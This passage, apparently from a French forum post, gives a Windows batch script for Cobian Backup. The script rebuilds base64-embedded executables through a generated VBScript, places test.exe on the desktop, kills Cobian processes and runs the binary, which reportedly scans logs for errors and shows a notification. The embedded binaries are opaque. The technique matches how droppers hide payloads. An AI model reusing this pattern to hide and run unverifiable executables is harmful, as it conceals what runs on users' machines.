vcmVncm91bmRXaW5kb3cAAABJc1dpbmRvd0VuYWJsZWQAAABFbmFibGVXaW5kb3cAAAAARW51bVdpbmRvd3MAAABTZXRXaW5kb3dQb3MAAAAARGVzdHJveVdpbmRvdwAAAEdldERDAAAAR2V0V2luZG93VGV4dExlbmd0aEEAAAAAR2V0V2luZG93VGV4dEEAAAAAU2V0UmVjdAAAAERyYXdUZXh0QQAAAEdldFdpbmRvd0xvbmdBAAAAAEdldFN5c3RlbU1ldHJpY3MAAAAAUmVsZWFzZURDAAAAR2V0U3lzQ29sb3IAAABHZXRTeXNDb2xvckJydXNoAAAAAENyZWF0ZVdpbmRvd0V4QQAAAENhbGxXaW5kb3dQcm9jQQAAAFNldFdpbmRvd0xvbmdQdHJBAAAAU2V0Rm9jdXMAAAAAUmVkcmF3V2luZG93AAAAAFJlbW92ZVByb3BBAAAARGVmV2luZG93UHJvY0EAAAAAU2V0UHJvcEEAAAAAR2V0UHJvcEEAAAAAR2V0UGFyZW50AAAAR2V0V2luZG93AAAAU2V0QWN0aXZlV2luZG93AAAAVW5yZWdpc3RlckNsYXNzQQAAAABEZXN0cm95QWNjZWxlcmF0b3JUYWJsZQAAAExvYWRJY29uQQAAAExvYWRDdXJzb3JBAAAAUmVnaXN0ZXJDbGFzc0EAAAAAQWRqdXN0V2luZG93UmVjdEV4AAAAAFNob3dXaW5kb3cAAAAAQ3JlYXRlQWNjZWxlcmF0b3JUYWJsZUEAAABQZWVrTWVzc2FnZUEAAAAATXNnV2FpdEZvck11bHRpcGxlT2JqZWN0cwAAAEdldE1lc3NhZ2VBAAAAR2V0QWN0aXZlV2luZG93AAAAVHJhbnNsYXRlQWNjZWxlcmF0b3JBAAAAVHJhbnNsYXRlTWVzc2FnZQAAAABEaXNwYXRjaE1lc3NhZ2VBAAAAAEVudW1DaGlsZFdpbmRvd3MAAAAAR2V0Q2xpZW50UmVjdAAAAEZpbGxSZWN0AAAAAEdldEZvY3VzAAAAAERlZkZyYW1lUHJvY0EAAABHZXRXaW5kb3dSZWN0AAAASXNDaGlsZAAAAEdldENsYXNzTmFtZUEAAABHZXRLZXlTdGF0ZQAAAERlc3Ryb3lJY29uAAAAUmVnaXN0ZXJXaW5kb3dNZXNzYWdlQQAAVVN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
set /p =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
set /p =T9KgsdFgkSSxSJfph+Eb3wbGsrWqFUCj9fSa73unwV3bgqi8QxfTA/hdp4zluUM4QLTrRydHqrlABHSNt3tvFJBPQBmmp0eJy856lgbCI+bM8XQXqbsmVMeFwirW3nrR30OcviqaRJJeqvvJ47KpCSrc18YCiVkKwotj1BAXEyLvgPSbRjtnN5WsR8HklCMA/lZkBS2nup6DL2Waokv1Xm7BLjjsxd+zAuDKK/jTxZdV24wAZW4plhFbe3HzcZyC4RBwNFW2Lp9YoIzL2pRkE2yivALbN0+VWhPtekmhHMGUP/xul6q3wQnjG73HMu5QIUIjfRUyVFVHUW2Z8jswboPIY0GX5UrlwYH5T/x4+dncVjrnV8qoyoJHeKZsWgUbTyBBoXqRHyZO06CrO6xZLjDyEV5/Z62a/2PLk8QAgq5cyxRHXIS4ntzdDXMVqYC1XRMR5wW2Ka1z275iTgXW9koTVGKNdJVW4eAseV+7jnmd4/YdKTMBbJATGlSsVSXjd3Y8Vc0WEdPZgsA/m4TnmGuxQ8JmqsLiPGNrqDjkuo0hUNSnrez+cajs9RRPL/kqm4WBbUdQC2LgAnf7tpACVGghzJszwAKlZKk7oQ+8UXBKJNAtrIZ7rLWecZ5rZKLHHc0AuedzgVwxvLphTwNyNnQvNoz9pWim0Nx4qIVq9ghouRrUK/WaovEOhohermAw6r3TZqUlwi08I9Q/98G8azYWDkXZ/C9s4C95y3f2NwR58HSV2VuciNCCBrOmQnwark0RtW3OxddcmBKAg4B+8yoEjpge4+FnrvTws94t4Ao6DEeIPI297HFvrrrOwp1CHtiIq7hCNZABYhG4QDNPoaeznpEVDHuZkUyAG+dcCvAr3zxge3T+W6K0kkp7g9lpO1XXPHzqGZGVKKcWCY/hYgfBEI+hnZQ/+VRwKJZuH3dm8a2Svz62xJtYhR8rH+GN4iughtaqULyflSdmPyLlyVSE71XrO6bbPfTj+zD6atBlxaCh3rkrbcJUtmUMzl4ND6DYJR/Qjl0dzMD+M06teuWeZCfIF9lMR5cY6WoFtVH813yPc82j7LmPWK8KyqnSUEEBAQAAAABQQTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPGFzc2VtYmx5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSIgbWFuaWZlc3RWZXJzaW9uPSIxLjAiPgogIDxhc3NlbWJseUlkZW50aXR5CiAgICB2ZXJzaW9uPSIxLjAuMC4wIgogICAgcHJvY2Vzc29yQXJjaGl0ZWN0dXJlPSJhbWQ2NCIKICAgIG5hbWU9IkNvbXBhbnlOYW1lLlByb2R1Y3ROYW1lLllvdXJBcHAiCiAgICB0eXBlPSJ3aW4zMiIgLz4KICA8ZGVzY3JpcHRpb24+PC9kZXNjcmlwdGlvbj4KICA8ZGVwZW5kZW5jeT4KICAgIDxkZXBlbmRlbnRBc3NlbWJseT4KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkKICAgICAgICB0eXBlPSJ3aW4zMiIKICAgICAgICBuYW1lPSJNaWNyb3NvZnQuV2luZG93cy5Db21tb24tQ29udHJvbHMiCiAgICAgICAgdmVyc2lvbj0iNi4wLjAuMCIKICAgICAgICBwcm9jZXNzb3JBcmNoaXRlY3R1cmU9ImFtZDY0IgogICAgICAgIHB1YmxpY0tleVRva2VuPSI2NTk1YjY0MTQ0Y2NmMWRmIgogICAgICAgIGxhbmd1YWdlPSIqIiAvPgogICAgPC9kZXBlbmRlbnRBc3NlbWJseT4KICA8L2RlcGVuZGVuY3k+Cgo8L2Fzc2VtYmx5PlBQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBREQ=
)>B64TMP.txt <nul
cscript /nologo test.exe.vbs
2>nul del test.exe.vbs
2>nul del "B64TMP.TXT"
move /y "test.exe" "C:\users\%username%\desktop\test.exe"

:log

taskkill /f /im Cobian.exe /im cbInterface.exe
"C:\users\%username%\desktop\test.exe"
"C:\Program Files (x86)\Cobian Backup 11\cobian.exe" -autoclose -bu

il reconstruit un fichier batch compilé "test.exe" (tu n'en a pas besoin avec le code precedent) voici le code de test.bat avant compilation :
Code:
@echo off
ping localhost -n 3 >nul
type *.txt >verif.txt
FINDSTR "impossible" verif.txt
cls
if %errorlevel%==0 (
goto erreur
) else (
goto reussi
)

:erreur
del /q "verif.txt"
echo. erreur trouvee !!
call :notify "corbian" " une erreur a ete detectee" " " Info 100
:Infinite & pause>nul & goto :Infinite
:notify
(
echo;TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANXl+FcAAAAAAAAAAOAAIgALATAAABYAAAAIAAAAAAAAZjUAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ1AABPAAAAAEAAALAFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADcMwAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAbBUAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAALAFAAAAQAAAAAYAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABINQAAAAAAAEgAAAACAAUAuCIAALQPAAADAAIABgAABmwyAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ4CKBQAAAoCKAUAAAYCFygVAAAKAhYoFgAACgIoAgAABgIoFwAACiobMAMAzQAAAAEAABEoGAAACgoCewIAAAQGF5pvGQAACgJ7AgAABAYZmm8aAAAKAnsCAAAEBhiabxsAAAoGGppyAQAAcCgcAAAKLA4CewIAAAQXbx0AAAorVQYamnILAABwKBwAAAosDgJ7AgAABBlvHQAACis4BhqachcAAHAoHAAACiwOAnsCAAAEFm8dAAAKKxsGGppyIQAAcCgcAAAKLAwCewIAAAQYbx0AAAoCewIAAAQoHgAACm8fAAAKBhuaKCAAAAoLAnsCAAAEB28hAAAK3gMm3gAqAAAAARAAAAAAsgAXyQADEwAAAQYqegMsEwJ7AQAABCwLAnsBAAAEbyIAAAoCAygjAAAKKgAAABMwAwCOAAAAAAAAAAJzJAAACn0BAAAEAgJ7AQAABHMlAAAKfQIAAAQCKCYAAAoCewIAAARyMQAAcG8ZAAAKAnsCAAAEF28nAAAKAh94FnMoAAAKKCkAAAoCckkAAHAoKgAACgIjAAAAAAAAAAAoKwAACgIXKCwAAAoCFygVAAAKAgL+BgMAAAZzLQAACiguAAAKAhYoLwAACipyAo5pGzIVKDAAAAoWKDEAAApzAQAABigyAAAKKh4CKDMAAAoqABMwAgAtAAAAAgAAEX4DAAAELSByVQAAcNAEAAACKDQAAApvNQAACnM2AAAKCgaAAwAABH4DAAAEKhp+BAAABCoeAoAEAAAEKhp+BQAABCoeAig3AAAKKlZzDAAABig4AAAKdAUAAAKABQAABCoAAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAA8BQAAI34AAKgFAAD